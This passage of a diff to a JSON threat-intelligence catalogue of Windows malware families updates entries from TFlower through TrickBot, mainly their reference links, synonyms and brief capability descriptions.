encrypted files, but prepends the marker \"*tflower\" and what may be the encrypted encryption key for the file to each affected file. Once encryption is completed, another status report is sent to the C2 server.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower", + "https://cyber.gc.ca/en/alerts/tflower-ransomware-campaign", + "https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/", + "https://www.sygnia.co/mata-framework" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bd5d0ff1-7bd1-4f8d-bf66-4d02f8e68dd2", + "value": "TFlower Ransomware" + }, { "description": "", "meta": { @@ -16668,6 +30410,19 @@ "uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34", "value": "Thanatos Ransomware" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thinmon", + "https://mp.weixin.qq.com/s/nyxZFXgrtm2-tBiV3-wiMg" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a416e88b-8fc0-41a9-bb2e-13cbcc5f22b0", + "value": "ThinMon" + }, { "description": "", "meta": { @@ -16694,6 +30449,24 @@ "uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52", "value": "ThumbThief" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx", + "https://id-ransomware.blogspot.com/2020/08/thunderx-ransomware.html", + "https://www.bleepingcomputer.com/news/security/thunderx-ransomware-rebrands-as-ranzy-locker-adds-data-leak-site/", + "https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/" + ], + "synonyms": [ + "Ranzy Locker" + ], + "type": [] + }, + "uuid": "e4be8d83-748e-46df-8dd7-0ce1b2255f36", + "value": "ThunderX Ransomware" + }, { "description": "", "meta": { @@ -16725,16 +30498,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba", - "https://labsblog.f-secure.com/2016/01/18/analyzing-tinba-configuration-data/", - "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/", - "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", + "https://adalogics.com/blog/the-state-of-advanced-code-injections", + "https://blogs.blackberry.com/en/2019/03/blackberry-cylance-vs-tinba-banking-trojan", + "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "http://contagiodump.blogspot.com/2012/06/amazon.html", "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf", - "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", "http://garage4hackers.com/entry.php?b=3086", - "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html", - "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/" + "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/", + "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/", + "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", + "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html" ], "synonyms": [ "Illi", @@ -16752,8 +30527,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader", "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", - "https://www.fidelissecurity.com/threatgeek/2017/07/deconstructing-tinyloader-0", - "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software" + "https://www.forcepoint.com/sites/default/files/resources/files/report-tinypos-analysis-en.pdf", + "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" ], "synonyms": [], "type": [] @@ -16766,7 +30542,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet", - "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/" + "https://github.com/SherifEldeeb/TinyMet", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", + "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://twitter.com/VK_Intel/status/1273292957429510150", + "https://www.secureworks.com/research/threat-profiles/gold-niagara", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672" ], "synonyms": [ "TiniMet" @@ -16781,14 +30564,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596", - "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702", "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet", + "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702", "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html", "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/", "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/", - "https://krebsonsecurity.com/tag/nuclear-bot/", - "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/" + "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/", + "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/", + "https://krebsonsecurity.com/tag/nuclear-bot/" ], "synonyms": [ "MicroBankingTrojan", @@ -16806,7 +30589,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon", - "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" + "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", + "https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign" ], "synonyms": [], "type": [] @@ -16819,6 +30603,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], @@ -16839,11 +30624,33 @@ "uuid": "c34091df-0df2-4ef6-bf69-c67eb711f6d8", "value": "Tiop" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tmanger", + "https://www.youtube.com/watch?v=1WfPlgtfWnQ", + "https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", + "https://vblocalhost.com/uploads/VB2020-20.pdf", + "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", + "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf" + ], + "synonyms": [ + "LuckyBack" + ], + "type": [] + }, + "uuid": "8d7108fe-65be-4853-945d-1d5376dbaa34", + "value": "Tmanger" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee", + "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", "https://www.cert.pl/en/news/single/tofsee-en/", "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/", "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/" @@ -16856,15 +30663,58 @@ "uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49", "value": "Tofsee" }, + { + "description": "TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files \u2013 temp.txt and temp2.txt \u2013 within the same directory of its execution.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf", + "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html", + "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "77e29e3a-d4a3-4692-b1f8-38ad6dc1af1d", + "value": "TONEDEAF" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonnerre", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf", + "https://research.checkpoint.com/2021/after-lightning-comes-thunder/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a7590aa5-d9fb-449f-8a5e-5233077b736e", + "value": "Tonnerre" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma", + "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html", + "http://blog.nsfocus.net/stumbzarus-apt-lazarus/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "69860c07-2acb-4674-8e68-41a1d8fe958a", + "value": "Torisma" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker", - "http://www.isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall/", "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/" ], - "synonyms": [], + "synonyms": [ + "Teerac" + ], "type": [] }, "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2", @@ -16875,6 +30725,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trat", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.gdatasoftware.com/blog/trat-control-via-smartphone", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.proofpoint.com/us/threat-insight/post/trat-new-modular-rat-appears-multiple-email-campaigns" ], "synonyms": [], @@ -16901,57 +30755,183 @@ "value": "TreasureHunter" }, { - "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Marco Enabled > Downloader > Trickbot\r\n3. Phish > Attached MS Office > Marco enabled > Trickbot installed", + "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\n2017 - Trickbot primarily uses Necurs as vehicle for installs.\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\nQ3/4 2018 - Trickbot starts being spread through Emotet.\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Macro Enabled > Downloader > Trickbot\r\n3. Phish > Attached MS Office > Macro enabled > Trickbot installed", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot", - "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", - "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", - "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/", - "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", + "https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows", "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module", - "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", + "https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez", + "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", + "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + "https://blogs.microsoft.com/on-the-issues/2020/10/20/trickbot-ransomware-disruption-update/", + "https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/", + "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", + "https://labs.vipre.com/trickbots-tricks/", + "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", + "https://labs.bitdefender.com/2020/11/trickbot-is-dead-long-live-trickbot/", + "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor", + "https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737", + "https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users", + "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/", + "https://www.secureworks.com/research/threat-profiles/gold-swathmore", + "https://twitter.com/anthomsec/status/1321865315513520128", + "https://www.hhs.gov/sites/default/files/bazarloader.pdf", + "https://www.cert.pl/en/news/single/detricking-trickbot-loader/", + "https://labs.sentinelone.com/building-a-custom-malware-analysis-lab-environment/", + "https://blog.talosintelligence.com/2020/03/trickbot-primer.html", + "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", + "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://public.intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts/", + "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", + "https://public.intel471.com/blog/global-trickbot-disruption-operation-shows-promise/", + "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", + "https://www.welivesecurity.com/wp-content/uploads/2021/02/ESET_Threat_Report_Q42020.pdf", + "https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf", + "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", + "https://securityintelligence.com/posts/trickbot-survival-instinct-trickboot-version/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/", + "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns", + "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/", + "https://www.youtube.com/watch?v=EyDiIAt__dI", + "https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/", + "https://www.cyberbit.com/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", + "https://www.govcert.ch/blog/37/trickbot-an-analysis-of-data-collected-from-the-botnet", + "https://noticeofpleadings.com/trickbot/files/Complaint%20and%20Summons/2020-10-06%20Trickbot%201%20Complaint%20with%20exs.pdf", + "https://www.intrinsec.com/deobfuscating-hunting-ostap/", + "https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass", + "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", + "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", + "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/12/21/trickbot_a_closerl-TpQ0.html", + "https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/", + "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/", + "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/", + "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", + "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", + "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", + "https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html", + "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607", + "https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/", + "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", + "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html", + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://www.youtube.com/watch?v=lTywPmZEU1A", + "https://www.secureworks.com/research/threat-profiles/gold-blackburn", + "https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure", + "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a", + "https://www.infosecurity-magazine.com/blogs/trickbot-mikrotik-connection/", + "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", + "https://www.bleepingcomputer.com/news/security/trickbot-malware-mistakenly-warns-victims-that-they-are-infected/", + "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/22/trickbot-fake-ips-part2.html", + "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", + "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html", "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html", "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", "https://www.youtube.com/watch?v=KMcSAlS9zGE", - "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", - "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", - "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/", + "https://cofenselabs.com/all-you-need-is-text-second-wave/", + "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", + "https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/", "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", - "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", + "https://unit42.paloaltonetworks.com/ryuk-ransomware/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption", "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", - "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", - "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", - "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", - "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", + "https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/", "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", - "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", - "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", - "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", - "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html", - "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", - "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", - "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", - "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", - "http://www.malware-traffic-analysis.net/2018/02/01/", - "https://www.cert.pl/en/news/single/detricking-trickbot-loader/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features", - "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", - "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", - "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-3-core", - "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", + "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", + "https://www.netscout.com/blog/asert/dropping-anchor", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://cyber.wtf/2020/08/31/trickbot-rdpscandll-password-transof/", + "https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/", + "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident", + "https://blog.lumen.com/a-look-inside-the-trickbot-botnet/", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", + "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", + "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", + "https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/", + "https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html", + "http://www.malware-traffic-analysis.net/2018/02/01/", + "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/", + "https://www.secdata.com/the-trickbot-and-mikrotik/", + "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", + "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", + "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", + "https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks", + "https://blog.cyberint.com/ryuk-crypto-ransomware", + "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly/", + "https://www.advanced-intel.com/post/trickbot-group-launches-test-module-alerting-on-fraud-activity", + "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", + "https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/", + "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/", + "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", + "https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/", + "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf", + "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", + "https://www.joesecurity.org/blog/498839998833561473", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", + "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/", + "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html", + "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", + "https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/", + "https://www.secureworks.com/research/threat-profiles/gold-ulrick", + "https://twitter.com/VK_Intel/status/1328578336021483522", + "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/", + "https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis", + "https://duo.com/decipher/trickbot-up-to-its-old-tricks", + "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/", + "https://hurricanelabs.com/splunk-tutorials/splunking-with-sysmon-part-4-detecting-trickbot/", + "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", + "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth", + 